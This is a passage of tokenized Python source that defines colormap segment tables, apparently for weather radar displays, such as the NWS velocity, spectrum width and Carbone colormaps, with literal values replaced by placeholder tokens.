<EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> 
, <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _NWSVel_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _NWS_SPW_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , 
<EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _RefDiff_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _Carbone11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> 
, <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Carbone17_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _RRate11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BlueBrown10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BlueBrown11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , 
<NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Theodore16_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> 
) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _EWilson17_data = { <EOL> '<STR_LIT>' 